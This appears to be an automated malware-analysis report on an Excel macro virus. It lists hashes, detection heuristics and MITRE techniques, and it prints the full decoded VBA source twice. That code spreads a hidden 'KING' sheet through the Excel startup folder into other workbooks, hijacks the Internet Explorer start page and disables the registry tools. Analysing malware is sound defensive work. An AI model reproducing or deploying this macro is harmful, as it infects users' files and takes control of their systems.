Office (OLE) malware analysis — malicious · aa408286ba48bcb2

MALICIOUS

Office (OLE)

15.0 KB Created: 2014-04-10 07:03:32 Authoring application: Microsoft Excel First seen: 2015-09-27

MD5: 801cd76230cf3f03e426425f307dd840 SHA-1: 275aaa6f3e76eded01e1691232fb662bd6515d1a SHA-256: aa408286ba48bcb21c9a6f1f4e46b2c62c99bc51a9de41cc4d2d9a8d2513bf77

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel file containing VBA macros. The auto_open subroutine triggers the ck_files subroutine, which checks for the existence of 'KING.XLS' in the startup path. If not found, it proceeds to create and save 'KING.XLS' in the startup path, indicating an attempt to establish persistence. The use of WScript.Shell and CreateObject further supports the malicious intent of executing commands or manipulating the system.

Heuristics 8

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set OperationRegistry = CreateObject("WScript.Shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set OperationRegistry = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://3azu.taobao.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2428 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2428 bytes
SHA-256: `0663e89275f3fec69944e5bf2a6cb0a8526cf165c91453c1e2fba6552174935d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KING" Sub auto_open() Application.OnSheetActivate = "ck_files" End Sub Sub ck_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "KING.XLS") 'results If m$ = "KING.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name Sheets("KING").Visible = True Sheets("KING").Select Sheets("KING").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("KING").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).name If s$ <> "KING" Then Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("KING").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case Else End Select Dim OperationRegistry On Error Resume Next Set OperationRegistry = CreateObject("WScript.Shell") MyUrl = "http://3azu.taobao.com" RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" OperationRegistry.RegWrite RegPath, "1", "REG_DWORD" Exit Sub '正常运行的话会在这里退出程序 End Sub

SHA-256: 0663e89275f3fec69944e5bf2a6cb0a8526cf165c91453c1e2fba6552174935d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KING"




Sub auto_open()
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "KING.XLS") 'results
    If m$ = "KING.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    Sheets("KING").Visible = True
    Sheets("KING").Select
    Sheets("KING").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    
    
    
    
    
    
    
    
    
    
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("KING").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).name
    If s$ <> "KING" Then
        Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("KING").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case Else
End Select
Dim OperationRegistry
On Error Resume Next

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl

RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"

Exit Sub   '正常运行的话会在这里退出程序

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.